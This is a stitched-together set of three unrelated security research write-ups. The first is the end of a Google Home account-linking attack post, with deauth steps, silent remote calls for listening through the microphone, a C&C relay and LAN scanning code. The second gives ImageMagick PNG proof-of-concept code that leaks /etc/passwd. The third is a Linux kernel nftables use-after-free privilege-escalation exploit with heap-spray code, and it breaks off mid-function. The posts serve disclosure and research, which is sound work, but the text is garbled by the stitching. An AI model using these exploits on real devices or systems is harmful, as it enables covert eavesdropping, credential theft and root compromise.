Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board, going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on MAC address prefix) and I was able to deauth it.
In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).
Stop the deauth attack and wait for the device to re-connect to the Internet
You can run python3 reset_volume.py 4 to reset the volume to 40% (since enabling night mode set it to 0%).
Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
To issue a call, run python3 call_device.py [phone number].
The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
The only thing the victim may notice is that the device's LEDs turn solid blue, but they'd probably just assume it's updating the firmware or something. In fact, the official support page describing what the LED colors mean only says solid blue means "Your speaker needs to be verified by you" and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.
Here’s a video demonstrating what it looks like when a call is initiated remotely:
As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).
PoC #2: Make arbitrary HTTP requests on victim’s network
As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN.
Under the default configuration, a proxy server starts on localhost:8000, and a WebSocket server starts on 0.0.0.0:9000. The proxy server acts as a relay, sending requests from programs on your computer (like curl) to the victim's Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim's Google Home could connect to it, but for local demonstration, it doesn't have to be.
Configure the local home app:
Change the C2_WS_URL variable at the top of app.js to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
Host the static index.html and app.js files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server.
Set the device attributes and deploy the cloud fulfillment:
npm run firebase --prefix functions/ -- functions:config:set \
strand1.leds=16 strand1.channel=1 \
strand1.control_protocol=HTTP
npm run deploy --prefix functions/
This tells the cloud fulfillment to include an otherDeviceIds field in responses to SYNC requests. As far as I understand, this is all that's required to activate local fulfillment; the specific device IDs or attributes you choose don't matter.
Get within wireless proximity of the victim's Google Home, then force it into setup mode, and link your account using the link_device.py script from PoC #1.
Reboot the device:
While still connected to the device's setup network, send a POST request to the /reboot endpoint with the body {"params":"now"} and a cast-local-authorization-token header (obtained with HomeGraphAPI.get_local_auth_tokens() from googleapi.py).
For local demonstration, you can just unplug the Google Home then plug it back in.
Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
The app waits for the IDENTIFY request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server, and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.
Now, you can send HTTP(S) requests on the victim's private LAN, as if you had the WiFi password, even though you don't (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example:
Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim's other devices are on. For example, my Google Home's IP is 192.168.86.132, so I could guess that my other devices are in the 192.168.86.0 to 192.168.86.255 range. You could write a simple script to curl every possible address (as sketched below), looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer's web interface at http://192.168.86.33. Its network settings page contains an <input type="password"> pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.
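A sweep along those lines only takes a few lines of Python (the subnet and timeout here are illustrative):

# Sketch: probe each host on the /24 for an HTTP interface.
import requests

for i in range(1, 255):
    url = f"http://192.168.86.{i}"
    try:
        r = requests.get(url, timeout=2)
        print(url, r.status_code, r.headers.get("Server", ""))
    except requests.RequestException:
        pass  # nothing listening (or unreachable) at this address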
Another approach would be looking for the victim's router and trying to attack that. My router's IP, 192.168.1.254, shows up among the first results when you Google "default router IPs". You could write a script to try these. My router's configuration interface also immediately returns my WiFi password in plaintext. Luckily, I've changed the default admin password, so at the very least an attacker with access to it wouldn't be able to modify the settings, but most people don't change this password, so you could find it by searching for "[brand name] router password", then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router's password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as "easy".
PoC #3: Read/write arbitrary files on device
I also found a way to read/write arbitrary files on the linked device using the DOM.setFileInputFiles and Page.setDownloadBehavior methods of the Chrome DevTools Protocol.
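As a rough sketch of how the read primitive can work (illustrative values and flow, not the exact contents of read.js): attach a device file to a file input with DOM.setFileInputFiles, then read it back with FileReader.

# Sketch: read a device file over CDP. The CDP methods are documented;
# the surrounding flow is a reconstruction.
import json
import time
import requests
import websocket  # pip install websocket-client

HOME_IP = "192.168.86.132"  # illustrative
ws_url = requests.get(f"http://{HOME_IP}:9222/json").json()[0]["webSocketDebuggerUrl"]
ws = websocket.create_connection(ws_url)
_id = 0

def cdp(method, **params):
    global _id
    _id += 1
    ws.send(json.dumps({"id": _id, "method": method, "params": params}))
    while True:
        reply = json.loads(ws.recv())
        if reply.get("id") == _id:
            return reply.get("result", {})

cdp("Page.navigate", url="data:text/html,<input type=file id=f>")
time.sleep(1)  # crude wait for the page to finish loading
root = cdp("DOM.getDocument")["root"]["nodeId"]
node = cdp("DOM.querySelector", nodeId=root, selector="#f")["nodeId"]
cdp("DOM.setFileInputFiles", files=["/tmp/example_file.txt"], nodeId=node)
result = cdp("Runtime.evaluate", awaitPromise=True, returnByValue=True,
             expression="new Promise(done => {"
                        " const fr = new FileReader();"
                        " fr.onload = () => done(fr.result);"
                        " fr.readAsText(document.getElementById('f').files[0]); })")
print(result["result"]["value"])  # the file's contents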
The following reproduction steps first write a file, then read it back.
Run python3 write_server.py. You can modify the host/port variables at the top of the script. Get the URL of the server, like http://[IP]:[port]. This must be reachable by the Google Home.
Run node write.js [Google Home IP] [write server URL] /tmp, inserting the appropriate values. You can get the Google Home's IP from the Google Home app. The file will be written to /tmp/example_file.txt.
Run python3 read_server.py. You can modify the host/port like before.
Run node read.js [Google Home IP] [read server URL]. When prompted for a file path to read, enter /tmp/example_file.txt.
Verify that example_file.txt was dumped from the device to dumped_files/example_file.txt.
Since I couldn't explore the filesystem of my Google Home (and <input type="file" webkitdirectory> didn't work to upload folders instead of files), I'm not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the "open source licenses" info, and from the DEFCON talk on the Google Home. I dumped a few binaries like /system/chrome/cast_shell and /system/chrome/lib/libassistant.so, then ran strings on them, looking for interesting files to steal or tamper with. I confirmed that I could dump a file, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?
The fixes
I’m aware of the following fixes deployed by Google:
You must request an invite to the "Home" that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API. If you're not added to the Home but you try to link your account this way, you'll get a PERMISSION_DENIED error.
“Call [phone number]” commands can’t be initiated remotely through routines.
You can still deauth the Google Home and access its device info through the /setup/eureka_info endpoint, but you can't use it to link your account anymore, and you can't access the rest of the local API (because you can't get a local auth token).
On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password which appears as a QR code on the display (scanned with the Google Home app), which adds an additional layer of protection.
Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.
Reflection/conclusions
Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.
Ever since the first Google Home device was released in November 2016, Google has continued to add more and more features to the device's cloud APIs, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I'm guessing that the engineers behind these features were under the assumption that the account linking process was secure.
Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.
As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.
Many thanks to Google for the incredibly generous rewards!
Disclosure timeline
01/08/2021: Reported
01/10/2021: Triaged
01/20/2021: Closed (Intended Behavior)
(I was busy with school stuff, so it took me a while to respond.)
During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.
show_led endpoint
To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (get_app_device_id) in the decompiled sources:
The information I was looking for was in defpackage/ufo.java:
SHOW_LED sounded interesting, and it wasn't in the unofficial docs. Searching for where this constant is used led me to StereoPairCreationActivity:
With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:
Looks like the payload consists of an integer animation_id. We can use the endpoint like so:
$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led
This makes the LEDs play a slow pulsing animation. Unfortunately, it seems that there are only two animations: 1 (reset LEDs to normal) and 2 (continuous pulsing). Oh, well.
Wi-Fi password encryption
I was also able to find the algorithm used to encrypt the user's Wi-Fi password before sending it through the /setup/connect_wifi endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that it was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we can see that the password is encrypted using RSA PKCS1 and the device's public key (from /setup/eureka_info):
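As a sketch of the client-side step (the eureka_info field that carries the device certificate is an assumption here):

# Sketch: RSA-PKCS1 encrypt the Wi-Fi password with the device public key.
# The field name carrying the certificate is an assumption.
import base64
import requests
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import padding

info = requests.get("https://192.168.86.132:8443/setup/eureka_info?params=sign",
                    verify=False).json()
cert = x509.load_pem_x509_certificate(info["sign"]["certificate"].encode())
ciphertext = cert.public_key().encrypt(b"hunter2", padding.PKCS1v15())
print(base64.b64encode(ciphertext).decode())  # value for /setup/connect_wifi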
Footnote: Deauth attacks on Google Home Mini
I mentioned above that the Google Home Mini doesn’t support WPA3, nor 802.11w. I’d like to clarify how I discovered this.
Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.
There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, meanwhile my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. Same results when I enabled WPA3. I tried “optional” and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).
I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename mushroom) hardware. I'm assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.
ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and is therefore very common to find on websites worldwide, since there is always a need to process pictures for users' profiles, catalogs, etc.
In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero-days were identified:
CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
How to trigger the exploitation?
To exploit the above-mentioned vulnerabilities remotely, an attacker needs to upload a malicious image to a website that processes images with ImageMagick.
The Ocelot team is very grateful to the team of ImageMagick volunteers, who validated and released the needed patches in a timely manner.
In this blog, the technical details of the vulnerabilities are explained.
CVE-2022-44267: Denial of service
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example during a resize operation, the convert process can be left waiting for stdin input, leading to a denial of service since the process won't be able to process other images.
A malicious actor could craft a PNG, or use an existing one, and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string "profile" (without quotes), ImageMagick interprets the text string as a filename and loads its content as a raw profile. If the specified filename is "-" (a single dash), ImageMagick tries to read the content from standard input, potentially leaving the process waiting forever.
Exploitation Path Execution:
Upload an image to trigger an ImageMagick command, like "convert"
ReadOnePNGImage (coders/png.c:2164): Reading the "tEXt" chunk
SetImageProfile (MagickCore/property.c:4360): Checking if the keyword equals "profile", copying the text string as the filename in line 4720, and saving the content in line 4722
FileToStringInfo (MagickCore/string.c:1005): storing the content into string_info->datum
CVE-2022-44268: Information disclosure
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example in a resize operation, the resulting image can have the content of an arbitrary file from the website embedded in it (if the magick binary has permissions to read that file).
A malicious actor could craft a PNG, or use an existing one, and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string "profile" (without quotes), ImageMagick interprets the text string as a filename and loads its content as a raw profile; the attacker can then download the resized image, which will come with the content of the remote file embedded.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164): Reading the tEXt chunk
SetImageProfile (MagickCore/property.c:4360): Checking if the keyword equals "profile", copying the text string as the filename in line 4720, and saving the content in line 4722
FileToStringInfo (MagickCore/string.c:1005): storing the content into string_info->datum
If a valid (and accessible) filename is provided, its content is returned by FileToStringInfo, and the StringInfo object makes its way back to the SetImageProperty function, which saves the blob into the newly generated image thanks to the SetImageProfile function:
This new image is then available for the attacker to download, with the arbitrary website file content embedded inside.
PoC: Malicious PNG content to leak “/etc/passwd” file:
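The PoC content is shown as an image in the original post and isn't reproduced here. The following is a hedged reconstruction of how such a PNG can be built with zlib; swapping "/etc/passwd" for "-" yields the CVE-2022-44267 DoS variant.
#include <stdio.h>
#include <arpa/inet.h>
#include <zlib.h>

// Write one PNG chunk: big-endian length, 4-byte type, data, CRC(type+data).
static void put_chunk(FILE *f, const char *type, const unsigned char *data, unsigned len) {
    unsigned nlen = htonl(len);
    fwrite(&nlen, 4, 1, f);
    fwrite(type, 4, 1, f);
    if (len) fwrite(data, 1, len, f);
    unsigned long crc = crc32(crc32(0L, Z_NULL, 0), (const unsigned char *)type, 4);
    if (len) crc = crc32(crc, data, len);
    unsigned ncrc = htonl((unsigned)crc);
    fwrite(&ncrc, 4, 1, f);
}

int main(void) {
    FILE *f = fopen("poc.png", "wb");
    if (!f) return 1;
    fwrite("\x89PNG\r\n\x1a\n", 1, 8, f);                       // PNG signature

    unsigned char ihdr[13] = {0,0,0,1, 0,0,0,1, 8, 0, 0, 0, 0}; // 1x1, 8-bit grayscale
    put_chunk(f, "IHDR", ihdr, sizeof(ihdr));

    // tEXt chunk: keyword "profile", NUL separator, then the file to embed.
    // Use "-" instead of "/etc/passwd" for the CVE-2022-44267 DoS variant.
    static const unsigned char text[] = "profile\0/etc/passwd";
    put_chunk(f, "tEXt", text, sizeof(text) - 1);

    unsigned char raw[2] = {0, 0};       // one scanline: filter byte + single pixel
    unsigned char comp[64];
    uLongf clen = sizeof(comp);
    compress(comp, &clen, raw, sizeof(raw));
    put_chunk(f, "IDAT", comp, (unsigned)clen);
    put_chunk(f, "IEND", NULL, 0);
    fclose(f);
    return 0;
}
After a conversion such as convert poc.png out.png, running identify -verbose out.png on the result should show a "Raw profile" section containing the hex-encoded file contents.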
It’s been a while since our last technical blog post, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targeting Linux kernel version 5.15. We strongly recommend a thorough read of both articles to better understand the vulnerability before reading this post, which focuses almost exclusively on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.
The aforementioned exploitation strategies differ from each other and from the one detailed here, since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the GFP_KERNEL flag or the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-* slab caches. In version 5.15, allocations performed with the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-cg-* slab caches. While in both 5.13 and 5.15 the affected object, nft_expr, is allocated using GFP_KERNEL, the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (struct msg_msg), is served from kmalloc-* in 5.13 but from kmalloc-cg-* in 5.15. Therefore, in 5.15, struct msg_msg cannot be used to exploit this vulnerability.
In 5.18.1, the object involved in the use-after-free vulnerability, nft_expr, is itself allocated with GFP_KERNEL_ACCOUNT in the kmalloc-cg-* slab caches. Since the exploitation strategies presented by NCC Group and Theori rely on objects allocated with GFP_KERNEL, they do not work against the latest vulnerable version of the Linux kernel.
This blog post presents a strategy that does work on the latest vulnerable version of the Linux kernel.
Vulnerability
Netfilter sets can be created with a maximum of two associated expressions that have the NFT_EXPR_STATEFUL flag. The vulnerability occurs when a set is created with an associated expression that does not have the NFT_EXPR_STATEFUL flag, such as the dynset and lookup expressions. These two expressions hold a reference to another set for updating it and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects holding a reference to it.
During the allocation of the associated dynset or lookup expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated with the set does not have the NFT_EXPR_STATEFUL flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process, where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.
Exploitation
Before jumping straight into the exploitation details, let's first look at the definitions of the structures involved in the vulnerability. The nft_set structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes the representation of maps and verdict maps possible (check the corresponding nftables wiki entry for more details). The nft_lookup and nft_dynset expressions have to be bound to a given set on which the add, delete, or update operations will be performed.
When a given nft_set has expressions bound to it, they are added to the nft_set.bindings doubly linked list. A visual representation of an nft_set with two expressions is shown in the diagram below.
The binding member of the nft_lookup and nft_dynset expressions is defined as follows:
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
/**
* struct nft_set_binding - nf_tables set binding
*
* @list: set bindings list node
* @chain: chain containing the rule bound to the set
* @flags: set action flags
*
* A set binding contains all information necessary for validation
* of new elements added to a bound set.
*/
struct nft_set_binding {
struct list_head list;
const struct nft_chain *chain;
u32 flags;
};
The important member in our case is the list member. It is of type struct list_head, the same as the nft_lookup.binding and nft_dynset.binding members. These are the foundation for building doubly linked lists in the kernel. For more details on how linked lists are implemented in the Linux kernel, refer to this article.
With this information, let's see what the vulnerability allows us to do. Since the UAF occurs within a doubly linked list, let's review the common operations on such lists and what they imply in our scenario. Instead of showing a generic example, we will use the linked list that is built with the nft_set and the expressions that can be bound to it.
In the diagram shown above, removing an expression from the set's bindings list boils down to the kernel's list_del() operation: unlinking an entry writes the addresses of its neighbours into the adjacent nodes, so when the freed expression is still present in the list, removing a neighbouring entry writes an address into the freed object's binding member. Since the binding members of the nft_lookup and nft_dynset expressions are defined at different offsets, the write operation is done at different offsets.
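For reference, the unlink operation at the heart of list_del() boils down to the following (simplified from the kernel's include/linux/list.h); the two stores are exactly the 8-byte writes described next.
struct list_head { struct list_head *next, *prev; };

// Simplified __list_del(): unlinking an entry stores the addresses of its
// neighbours into the adjacent nodes. When one of those nodes lives inside a
// freed object, these stores become the use-after-free write primitive.
static inline void __list_del(struct list_head *prev, struct list_head *next) {
    next->prev = prev;   // 8-byte write into the next node's prev field
    prev->next = next;   // 8-byte write into the prev node's next field
}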
With this out of the way, we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:
nft_lookup: Write an 8-byte address at offset 24 (binding.list->next) or offset 32 (binding.list->prev) of a freed nft_lookup object.
nft_dynset: Write an 8-byte address at offset 64 (binding.list->next) or offset 72 (binding.list->prev) of a freed nft_dynset object.
The offsets mentioned above take into account the fact that the nft_lookup and nft_dynset expressions are bundled in the data member of an nft_expr object (the data member is at offset 8).
In order to do something useful with the limited write primitives that the vulnerability offers, we need to find objects allocated within the same slab caches as the nft_lookup and nft_dynset expression objects that have an interesting member at the listed offsets. Therefore, the objects suitable for exploitation will be different from those used in the publicly available exploits targeting versions 5.13 and 5.15.
Exploit Strategy
The ultimate primitives we need to exploit this vulnerability are the following:
Memory leak primitive: Mainly to defeat KASLR.
RIP control primitive: To achieve kernel code execution and escalate privileges.
However, neither of these can be achieved using only the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can, however, be used to corrupt the object that replaces the freed allocation. This can be leveraged to force a partial free of the nft_set, nft_lookup, or nft_dynset objects.
Partially freeing nft_lookup and nft_dynset objects can help with leaking pointers, while partially freeing an nft_set object can be pretty useful for crafting a partially faked nft_set to achieve RIP control, since it has an ops member that points to a function table.
Therefore, the high-level exploitation strategy is the following:
Leak the kernel image base address.
Leak a pointer to an nft_set object.
Obtain RIP control.
Escalate privileges by overwriting the kernel's MODPROBE_PATH global variable.
Return execution to userland and drop a root shell.
Partial Object Free Primitive
A partial object free primitive can be built by looking for a kernel object allocated with
GFP_KERNEL_ACCOUNT
within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed,
kfree()
has to be called on that pointer in order to partially free the targeted object.
One such object is the fdtable object, which holds the file descriptor table for a given process. Its definition is shown below.
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
struct fdtable {
unsigned int max_fds; /* 0 4 */
/* XXX 4 bytes hole, try to pack */
struct file * * fd; /* 8 8 */
long unsigned int * close_on_exec; /* 16 8 */
long unsigned int * open_fds; /* 24 8 */
long unsigned int * full_fds_bits; /* 32 8 */
struct callback_head rcu __attribute__((__aligned__(8))); /* 40 16 */
/* size: 56, cachelines: 1, members: 6 */
/* sum members: 52, holes: 1, sum holes: 4 */
/* forced alignments: 1 */
/* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));
The size of an fdtable object is 56 bytes; it is allocated in the kmalloc-cg-64 slab and thus can be used to replace nft_lookup objects. It has a member of interest at offset 24 (open_fds), which is a pointer to an unsigned long integer array. fdtable objects are allocated by the kernel function alloc_fdtable(), which is reached when a process's file descriptor table has to grow beyond the default 64 embedded slots (for example, when fork() copies an already enlarged descriptor table via dup_fd()).
A kfree() call on the open_fds pointer can then be triggered by simply terminating the child process that allocated the fdtable object.
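A minimal sketch of such a spray is shown below; the details (spray counts, synchronization) are simplified, and the 65-descriptor trick matches the dup() step used later in the leak.
#include <signal.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

// Each child holding more than 64 descriptors forces a fresh fdtable
// allocation (alloc_fdtable()) in kmalloc-cg-64; killing the child later
// frees it, kfree()ing whatever pointer sits in its open_fds member.
static pid_t spray_one_fdtable(void) {
    pid_t pid = fork();
    if (pid == 0) {
        for (int i = 0; i < 65; i++)        // grow past the 64 embedded slots
            if (dup(STDOUT_FILENO) < 0) exit(1);
        pause();                            // keep the fdtable alive for now
        exit(0);
    }
    return pid;
}

static void partial_free_via_fdtable(pid_t pid) {
    kill(pid, SIGKILL);                     // teardown frees fd, open_fds, fdt
    waitpid(pid, NULL, 0);
}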
Leaking Pointers
The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the
msg_msg
structure, which is allocated in
kmalloc-cg-*
slab caches starting from kernel version 5.14.
The msg_msg structure acts as the header of a System V message, which can be created via the userland msgsnd() function. The content of the message is placed right after the header within the same allocation. System V messages are a widely used heap spraying primitive in exploitation.
Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.
It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation; otherwise it would overwrite the msg_msg header. This restriction rules out the nft_lookup object as a candidate for this technique, since it is only possible to write the pointer at either offset 24 or offset 32 within that object. The ability to overwrite the msg_msg.m_ts member, which defines the size of the message, would help build a strong out-of-bounds read primitive if the value were large enough. However, there is a check in the code to ensure that the m_ts member is not negative when interpreted as a signed long integer, and heap addresses start with 0xffff, making them negative long integers.
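As a concrete illustration, a spray of tagged messages sized for kmalloc-cg-96 could look roughly like the sketch below; the 48-byte header size and the offset-24 tag follow the steps described in the next subsection.
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

// The msg_msg header occupies the first 48 bytes, so a 48-byte body makes the
// whole allocation 96 bytes and lands it in kmalloc-cg-96. The tag at body
// offset 24 marks where a leaked pointer is expected to show up later.
struct spray_msg {
    long mtype;
    char body[48];
};

static int spray_msgs(int count) {
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    for (int i = 0; i < count; i++) {
        struct spray_msg m = { .mtype = 1 };
        memset(m.body, 0, sizeof(m.body));
        memcpy(&m.body[24], "TAGTAG!!", 8);  // marker to detect corruption
        msgsnd(qid, &m, sizeof(m.body), 0);  // msgsz excludes the mtype field
    }
    return qid;  // later: msgrcv() each message and look for a missing tag
}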
Leaking an nft_set Pointer
Leaking a pointer to an nft_set object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:
1. Create a target set where the expressions will be bound to.
2. Create a rule with a lookup expression bound to the target set from step 1.
3. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to embed in a set, the nft_dynset object will be freed but not removed from the target set's bindings list, causing a UAF.
4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 24 so the one corrupted with the nft_set pointer can later be identified.
5. Remove the rule created in step 2, which removes the entry of the nft_lookup expression from the target set's bindings list. Removing it from the list effectively writes a pointer to the target nft_set object where the original binding.list.prev member was (offset 72). Since the freed nft_dynset object was replaced by a System V message, the pointer to the nft_set is written at offset 24 within the message data.
6. Use the userland msgrcv() function to read the messages and check which one no longer has the tag, as it will have been replaced by the pointer to the nft_set.
Leaking a Kernel Function Pointer
Leaking a kernel pointer requires a bit more work than leaking a pointer to an
nft_set
object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using
fdtable
object already described. The steps followed to leak a pointer to a kernel function are the following.
1. Increase the number of open file descriptors by calling dup() on stdout 65 times.
2. Create a target set where the expressions will be bound to (different from the one used in the nft_set address leak).
3. Create a set with an embedded nft_lookup expression bound to the target set. Since this is considered an invalid expression to embed in a set, the nft_lookup object will be freed but not removed from the target set's bindings list, causing a UAF.
4. Spray fdtable objects in order to replace the nft_lookup object freed in step 3.
5. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to embed in a set, the nft_dynset object will be freed but not removed from the target set's bindings list, causing a UAF. This addition to the bindings list writes the pointer to its binding member into the open_fds member of the fdtable object (allocated in step 4) that replaced the nft_lookup object.
6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 8 so the corrupted one can be identified.
7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the nft_dynset object, effectively causing a UAF on part of a System V message.
8. Spray time_namespace objects in order to replace the partially freed System V message from step 7. The reason for using time_namespace objects is explained later.
9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use msgrcv() to read its data, which overlaps with the newly allocated time_namespace object. Offset 40 of the data portion of the System V message corresponds to the time_namespace.ns->ops member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel image base to this function table, it is possible to calculate the kernel image base address.
10. Clean up the child processes used to spray the time_namespace objects.
time_namespace objects are interesting because they contain an ns_common structure embedded in them, which in turn contains an ops member that points to a function table with functions defined within the kernel core.
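A hedged sketch of how such a spray can be done is shown below; it assumes, as the steps above imply, that each unshare(CLONE_NEWTIME) allocates a struct time_namespace out of kmalloc-cg-96.
#define _GNU_SOURCE
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>

// unshare(CLONE_NEWTIME) makes the kernel allocate a time_namespace object
// (it applies to the caller's children), which here simply serves as the
// spray object replacing the partially freed System V message. An
// unprivileged caller may need to unshare a user namespace first.
static pid_t spray_one_time_ns(void) {
    pid_t pid = fork();
    if (pid == 0) {
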